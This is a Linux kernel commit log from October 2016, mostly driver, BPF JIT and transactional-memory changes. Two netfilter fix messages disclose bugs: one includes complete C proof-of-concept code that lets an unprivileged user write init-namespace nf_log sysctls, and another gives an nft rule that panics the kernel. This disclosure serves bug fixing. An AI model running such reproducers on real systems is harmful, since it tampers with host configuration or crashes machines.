summaryrefslogtreecommitdiff
AgeCommit message (Collapse)Author
2016-10-04drm/i915: Use binary search when looking up forcewake domainsTvrtko Ursulin
Instead of the existing linear seach, now that we have sorted range tables, we can do a binary search on them for some potential miniscule performance gain, but more importantly for elegance and code size. Hopefully the perfomance gain is sufficient to offset the function calls which were not there before. v2: Removed const cast away. Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
2016-10-04drm/i915: Sort forcewake mapping tablesTvrtko Ursulin
Sorting the tables (verified at runtime to help during development) is another prerequisite for interesting work which will follow. v2: * Remove const away cast and improve comments. (Chris Wilson) * Check tables only when debug option is enabled. v3: Use IS_ENABLED. (Chris Wilson) Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
2016-10-04drm/i915: Data driven register to forcewake domains lookupTvrtko Ursulin
Move finding the correct forcewake domains to take for register access from code to a mapping table. This will allow more interesting work in the following patches and is easier to review if singled out early. Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
2016-10-04drm/i915: Do not inline forcewake taking in mmio accessorsTvrtko Ursulin
Once we know we need to take new forcewakes, that being a slow operation, it does not make sense to inline that code into every mmio accessor. Move it to a separate function and save some code. v2: Be explicit with noinline and remove stale comment. (Chris Wilson) Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
2016-10-04drm/i915: Keep track of active forcewake domains in a bitmaskTvrtko Ursulin
There are current places in the code, and there will be more in the future, which iterate the forcewake domains to find out which ones are currently active. To save them from doing this iteration, we can cheaply keep a mask of active domains in dev_priv->uncore.fw_domains_active. This has no cost in terms of object size, even manages to shrink it overall by 368 bytes on my config. Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Cc: "Paneri, Praveen" <praveen.paneri@intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
2016-10-04drm/i915: Remove redundant hsw_write* mmio functionsTvrtko Ursulin
They are completely identical to gen6_write* ones. Signed-off-by: Tvrtko Ursulin <tvrtko.ursulin@intel.com> Reviewed-by: Joonas Lahtinen <joonas.lahtinen@linux.intel.com> Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
2016-10-04drm/i915: workaround sparse warning on variable length arraysJani Nikula
Fix sparse warning: drivers/gpu/drm/i915/intel_device_info.c:195:31: warning: Variable length array is used. In truth the array does have constant length, but sparse is too dumb to realize. This is a bit ugly, but silence the warning no matter what. Fixes: 91bedd34abf0 ("drm/i915/bdw: Check for slice, subslice and EU count for BDW") Reviewed-by: Joonas Lahtinen <joonas.lahtinen@linux.intel.com> Signed-off-by: Jani Nikula <jani.nikula@intel.com> Link: http://patchwork.freedesktop.org/patch/msgid/1475574853-4178-1-git-send-email-jani.nikula@intel.com
2016-10-04powerpc/bpf: Add support for bpf constant blindingNaveen N. Rao
In line with similar support for other architectures by Daniel Borkmann. 'MOD Default X' from test_bpf without constant blinding: 84 bytes emitted from JIT compiler (pass:3, flen:7) d0000000058a4688 + <x>: 0: nop 4: nop 8: std r27,-40(r1) c: std r28,-32(r1) 10: xor r8,r8,r8 14: xor r28,r28,r28 18: mr r27,r3 1c: li r8,66 20: cmpwi r28,0 24: bne 0x0000000000000030 28: li r8,0 2c: b 0x0000000000000044 30: divwu r9,r8,r28 34: mullw r9,r28,r9 38: subf r8,r9,r8 3c: rotlwi r8,r8,0 40: li r8,66 44: ld r27,-40(r1) 48: ld r28,-32(r1) 4c: mr r3,r8 50: blr ... and with constant blinding: 140 bytes emitted from JIT compiler (pass:3, flen:11) d00000000bd6ab24 + <x>: 0: nop 4: nop 8: std r27,-40(r1) c: std r28,-32(r1) 10: xor r8,r8,r8 14: xor r28,r28,r28 18: mr r27,r3 1c: lis r2,-22834 20: ori r2,r2,36083 24: rotlwi r2,r2,0 28: xori r2,r2,36017 2c: xoris r2,r2,42702 30: rotlwi r2,r2,0 34: mr r8,r2 38: rotlwi r8,r8,0 3c: cmpwi r28,0 40: bne 0x000000000000004c 44: li r8,0 48: b 0x000000000000007c 4c: divwu r9,r8,r28 50: mullw r9,r28,r9 54: subf r8,r9,r8 58: rotlwi r8,r8,0 5c: lis r2,-17137 60: ori r2,r2,39065 64: rotlwi r2,r2,0 68: xori r2,r2,39131 6c: xoris r2,r2,48399 70: rotlwi r2,r2,0 74: mr r8,r2 78: rotlwi r8,r8,0 7c: ld r27,-40(r1) 80: ld r28,-32(r1) 84: mr r3,r8 88: blr Signed-off-by: Naveen N. Rao <naveen.n.rao@linux.vnet.ibm.com> Acked-by: Daniel Borkmann <daniel@iogearbox.net> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc/bpf: Implement support for tail callsNaveen N. Rao
Tail calls allow JIT'ed eBPF programs to call into other JIT'ed eBPF programs. This can be achieved either by: (1) retaining the stack setup by the first eBPF program and having all subsequent eBPF programs re-using it, or, (2) by unwinding/tearing down the stack and having each eBPF program deal with its own stack as it sees fit. To ensure that this does not create loops, there is a limit to how many tail calls can be done (currently 32). This requires the JIT'ed code to maintain a count of the number of tail calls done so far. Approach (1) is simple, but requires every eBPF program to have (almost) the same prologue/epilogue, regardless of whether they need it. This is inefficient for small eBPF programs which may not sometimes need a prologue at all. As such, to minimize impact of tail call implementation, we use approach (2) here which needs each eBPF program in the chain to use its own prologue/epilogue. This is not ideal when many tail calls are involved and when all the eBPF programs in the chain have similar prologue/epilogue. However, the impact is restricted to programs that do tail calls. Individual eBPF programs are not affected. We maintain the tail call count in a fixed location on the stack and updated tail call count values are passed in through this. The very first eBPF program in a chain sets this up to 0 (the first 2 instructions). Subsequent tail calls skip the first two eBPF JIT instructions to maintain the count. For programs that don't do tail calls themselves, the first two instructions are NOPs. Signed-off-by: Naveen N. Rao <naveen.n.rao@linux.vnet.ibm.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc/bpf: Introduce accessors for using the tmp local stack spaceNaveen N. Rao
While at it, ensure that the location of the local save area is consistent whether or not we setup our own stackframe. This property is utilised in the next patch that adds support for tail calls. Signed-off-by: Naveen N. Rao <naveen.n.rao@linux.vnet.ibm.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc/fadump: Fix build break when CONFIG_PROC_VMCORE=nMichael Ellerman
The fadump code calls vmcore_cleanup() which only exists if CONFIG_PROC_VMCORE=y. We don't want to depend on CONFIG_PROC_VMCORE, because it's user selectable, so just wrap the call in an #ifdef. Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc: tm: Enable transactional memory (TM) lazily for userspaceCyril Bur
Currently the MSR TM bit is always set if the hardware is TM capable. This adds extra overhead as it means the TM SPRS (TFHAR, TEXASR and TFAIR) must be swapped for each process regardless of if they use TM. For processes that don't use TM the TM MSR bit can be turned off allowing the kernel to avoid the expensive swap of the TM registers. A TM unavailable exception will occur if a thread does use TM and the kernel will enable MSR_TM and leave it so for some time afterwards. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc/tm: Add TM Unavailable ExceptionCyril Bur
If the kernel disables transactional memory (TM) and userspace still tries TM related actions (TM instructions or TM SPR accesses) TM aware hardware will cause the kernel to take a facility unavailable exception. Add checks for the exception being caused by illegal TM access in userspace. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> [mpe: Rewrite comment entirely, bugs in it are mine] Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc: Remove do_load_up_transact_{fpu,altivec}Cyril Bur
Previous rework of TM code leaves these functions unused Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc: tm: Rename transct_(*) to ck(\1)_stateCyril Bur
Make the structures being used for checkpointed state named consistently with the pt_regs/ckpt_regs. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04powerpc: tm: Always use fp_state and vr_state to store live registersCyril Bur
There is currently an inconsistency as to how the entire CPU register state is saved and restored when a thread uses transactional memory (TM). Using transactional memory results in the CPU having duplicated (almost) all of its register state. This duplication results in a set of registers which can be considered 'live', those being currently modified by the instructions being executed and another set that is frozen at a point in time. On context switch, both sets of state have to be saved and (later) restored. These two states are often called a variety of different things. Common terms for the state which only exists after the CPU has entered a transaction (performed a TBEGIN instruction) in hardware are 'transactional' or 'speculative'. Between a TBEGIN and a TEND or TABORT (or an event that causes the hardware to abort), regardless of the use of TSUSPEND the transactional state can be referred to as the live state. The second state is often to referred to as the 'checkpointed' state and is a duplication of the live state when the TBEGIN instruction is executed. This state is kept in the hardware and will be rolled back to on transaction failure. Currently all the registers stored in pt_regs are ALWAYS the live registers, that is, when a thread has transactional registers their values are stored in pt_regs and the checkpointed state is in ckpt_regs. A strange opposite is true for fp_state/vr_state. When a thread is non transactional fp_state/vr_state holds the live registers. When a thread has initiated a transaction fp_state/vr_state holds the checkpointed state and transact_fp/transact_vr become the structure which holds the live state (at this point it is a transactional state). This method creates confusion as to where the live state is, in some circumstances it requires extra work to determine where to put the live state and prevents the use of common functions designed (probably before TM) to save the live state. With this patch pt_regs, fp_state and vr_state all represent the same thing and the other structures [pending rename] are for checkpointed state. Acked-by: Simon Guo <wei.guo.simon@gmail.com> Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add checks for transactional VSXs in signal contextsCyril Bur
If a thread receives a signal while transactional the kernel creates a second context to show the transactional state of the process. This test loads some known values and waits for a signal and confirms that the expected values are in the signal context. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add checks for transactional VMXs in signal contextsCyril Bur
If a thread receives a signal while transactional the kernel creates a second context to show the transactional state of the process. This test loads some known values and waits for a signal and confirms that the expected values are in the signal context. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add checks for transactional FPUs in signal contextsCyril Bur
If a thread receives a signal while transactional the kernel creates a second context to show the transactional state of the process. This test loads some known values and waits for a signal and confirms that the expected values are in the signal context. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add checks for transactional GPRs in signal contextsCyril Bur
If a thread receives a signal while transactional the kernel creates a second context to show the transactional state of the process. This test loads some known values and waits for a signal and confirms that the expected values are in the signal context. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Check that signals always get deliveredCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Add TM tcheck helpers in CCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Allow tests to extend their kill timeoutCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Introduce GPR asm helper header fileCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Move VMX stack frame macros to header fileCyril Bur
Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Rework FPU stack placement macros and move to header fileCyril Bur
The FPU regs are placed at the top of the stack frame. Currently the position expected to be passed to the macro. The macros now should be passed the stack frame size and from there they can calculate where to put the regs, this makes the use simpler. Also move them to a header file to be used in an different area of the powerpc selftests Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04selftests/powerpc: Check for VSX preservation across userspace preemptionCyril Bur
Ensure the kernel correctly switches VSX registers correctly. VSX registers are all volatile, and despite the kernel preserving VSX across syscalls, it doesn't have to. Test that during interrupts and timeslices ending the VSX regs remain the same. Signed-off-by: Cyril Bur <cyrilbur@gmail.com> Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
2016-10-04drm/i915: keep CONFIG_DRM_FBDEV_EMULATION=n function stubs togetherJani Nikula
Move the outcast intel_fbdev_output_poll_changed() stub for CONFIG_DRM_FBDEV_EMULATION=n next to its friends. Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk> Signed-off-by: Jani Nikula <jani.nikula@intel.com> Link: http://patchwork.freedesktop.org/patch/msgid/1475567628-5529-1-git-send-email-jani.nikula@intel.com
2016-10-04Merge tag 'perf-core-for-mingo-20161003' of ↵Ingo Molnar
git://git.kernel.org/pub/scm/linux/kernel/git/acme/linux into perf/urgent Pull perf/core improvements and fixes: - Allow vendors to provide JSON files describing PMU events, that then get parsed to generate C tables that are linked against perf, allowing the use of the names in their documentations, such as: # perf list l1d List of pre-defined events (to be used in -e): Cache: l1d.replacement [L1D data line replacements] l1d_pend_miss.fb_full [Cycles a demand request was blocked due to Fill Buffers inavailability] l1d_pend_miss.pending [L1D miss oustandings duration in cycles] l1d_pend_miss.pending_cycles [Cycles with L1D load Misses outstanding] l1d_pend_miss.pending_cycles_any [Cycles with L1D load Misses outstanding from any thread on physical core] l2_trans.l1d_wb [L1D writebacks that access L2 cache] Pipeline: cycle_activity.cycles_l1d_miss [Cycles while L1 cache miss demand load is outstanding] cycle_activity.cycles_l1d_pending [Cycles while L1 cache miss demand load is outstanding] cycle_activity.stalls_l1d_miss [Execution stalls while L1 cache miss demand load is outstanding] cycle_activity.stalls_l1d_pending [Execution stalls while L1 cache miss demand load is outstanding] The above example was done on a Broadwell based ThinkPad t450s after downloading and installing such JSON files which will be added to the tools/perf/pmu-events/ directory in a subsequent patchkit. Now one can use those names with -e/--event in all 'perf tools'. (Andi Kleen, Sukadev Bhattiprolu) - Add a missing pointer dereference in 'perf probe' (Colin Ian King) - Add support for building host programs to be used in generating files to be used in the build process, such as fixdep and jevents, fixing the usage of these features in a cross compilation setup (Jiri Olsa) Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com> Signed-off-by: Ingo Molnar <mingo@kernel.org>
2016-10-04Revert "sched/core: Do not use smp_processor_id() with preempt enabled in ↵Ingo Molnar
smpboot_thread_fn()" This reverts commit 4fa5cd5245b627db88c9ca08ae442373b02596b4. The original change widens a preempt-off section, to avoid a seemingly unsafe smp_processor_id() use. During review I overlooked two facts: - The code to calls a non-trivial function callback: ht->park(td->cpu); ... which might (and does occasionally) sleep, triggering the warning. - More importantly, as pointed out by Peter Zijlstra, using smp_processor_id() in that context is safe, if it's done from a kernel thread that is pinned to a single CPU - which is the case here. So revert to the original code that enables preemption sooner. Reported-by: kernel test robot <xiaolong.ye@intel.com> Acked-by: Peter Zijlstra <peterz@infradead.org> Cc: Con Kolivas <kernel@kolivas.org> Cc: Alfred Chen <cchalpha@gmail.com> Link: http://lkml.kernel.org/r/20160930015102.GB20189@yexl-desktop Signed-off-by: Ingo Molnar <mingo@kernel.org>
2016-10-04Merge remote-tracking branch 'net-next/master' into mac80211-nextJohannes Berg
Resolve the merge conflict between Felix's/my and Toke's patches coming into the tree through net and mac80211-next respectively. Most of Felix's changes go away due to Toke's new infrastructure work, my patch changes to "goto begin" (the label wasn't there before) instead of returning NULL so flow control towards drivers is preserved better. Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-04MAINTAINERS: net: add entry for Freescale QorIQ DPAA FMan driverMadalin Bucur
Add record for Freescale QORIQ DPAA FMan driver adding myself as maintainer. Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: remove leftover commentMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04netfilter: nft_limit: fix divided by zero panicLiping Zhang
After I input the following nftables rule, a panic happened on my system: # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second divide error: 0000 [#1] SMP [ ... ] RIP: 0010:[<ffffffffa059035e>] [<ffffffffa059035e>] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit] Call Trace: [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables] [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat] [<ffffffff81753767>] ? ipt_do_table+0x327/0x610 [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [<ffffffff816f4aa2>] nf_iterate+0x62/0x80 [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0 [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0 [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0 [<ffffffff81703d3c>] ip_local_out+0x1c/0x40 This is because divisor is 64-bit, but we treat it as a 32-bit integer, then 0xf00000000 becomes zero, i.e. divisor becomes 0. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04netfilter: fix namespace handling in nf_log_proc_dostringJann Horn
nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04fsl/fman: fix return value checkingMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: simplify redundant conditionMadalin Bucur
Change suggested by David Binderman, thanks. Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: check of_get_phy_mode() return valueMadalin Bucur
For unknown compatibles avoid crashing and default to SGMII. Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: check pcsphy pointer before useMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: MEMAC may use QSGMII PHY interface modeMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: return a phy_dev pointer from initMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: simplify device tree readsMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04fsl/fman: use of_get_phy_mode()Madalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@freescale.com>
2016-10-04fsl/fman: small fixesMadalin Bucur
Make module params static, proper NULL checks, remove __iomem label when misused. Signed-off-by: Madalin Bucur <madalin.bucur@freescale.com>
2016-10-04fsl/fman: fix loadable module compilationIgal Liberman
Signed-off-by: Igal Liberman <igal.liberman@freescale.com>
2016-10-04fsl/fman: split lines over 80 charactersMadalin Bucur
Signed-off-by: Madalin Bucur <madalin.bucur@nxp.com>
2016-10-04drm/rockchip: analogix_dp: Refuse to enable PSR if panel doesn't support itTomeu Vizoso
There's no point in enabling PSR when the panel doesn't support it. This also avoids a problem when PSR gets enabled when a CRTC is being disabled, because sometimes in that situation the DSP_HOLD_VALID_INTR interrupt on which we wait will never arrive. This was observed on RK3288 with a panel without PSR (veyron-jaq Chromebook). It's very easy to reproduce by running the kms_rmfb test in IGT a few times. Cc: Yakir Yang <ykk@rock-chips.com> Reviewed-by: Sean Paul <seanpaul@chromium.org> Signed-off-by: Tomeu Vizoso <tomeu.vizoso@collabora.com> Signed-off-by: Archit Taneja <architt@codeaurora.org> Link: http://patchwork.freedesktop.org/patch/msgid/1474639600-30090-2-git-send-email-tomeu.vizoso@collabora.com
2016-10-04drm/bridge: analogix_dp: Add analogix_dp_psr_supportedTomeu Vizoso
So users know whether PSR should be enabled or not. Cc: Yakir Yang <ykk@rock-chips.com> Reviewed-by: Sean Paul <seanpaul@chromium.org> Signed-off-by: Tomeu Vizoso <tomeu.vizoso@collabora.com> Signed-off-by: Archit Taneja <architt@codeaurora.org> Link: http://patchwork.freedesktop.org/patch/msgid/1474639600-30090-1-git-send-email-tomeu.vizoso@collabora.com
2016-10-04drm/fb-helper: add DRM_FB_HELPER_DEFAULT_OPS for fb_opsStefan Christ
The define DRM_FB_HELPER_DEFAULT_OPS provides the drm_fb_helper default implementations for functions in struct fb_ops. A drm driver can use it like: static struct fb_ops drm_fbdev_cma_ops = { .owner = THIS_MODULE, DRM_FB_HELPER_DEFAULT_OPS, /* driver specific implementations */ }; Suggested-by: Daniel Vetter <daniel@ffwll.ch> Signed-off-by: Stefan Christ <contact@stefanchrist.eu> Reviewed-by: Gustavo Padovan <gustavo.padovan@collabora.co.uk> Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch> Link: http://patchwork.freedesktop.org/patch/msgid/1475182136-15191-2-git-send-email-contact@stefanchrist.eu
2016-10-04drm: Document caveats around atomic event handlingDaniel Vetter
It's not that obvious how a driver can all race the atomic commit with handling the completion event. And there's unfortunately a pile of drivers with rather bad event handling which misdirect people into the wrong direction. Try to remedy this by documenting everything better. v2: Type fixes Alex spotted. v3: More typos Alex spotted. Cc: Andrzej Hajda <a.hajda@samsung.com> Cc: Alex Deucher <alexdeucher@gmail.com> Reviewed-by: Alex Deucher <alexander.deucher@amd.com> Signed-off-by: Daniel Vetter <daniel.vetter@intel.com> Link: http://patchwork.freedesktop.org/patch/msgid/1475229896-6047-1-git-send-email-daniel.vetter@ffwll.ch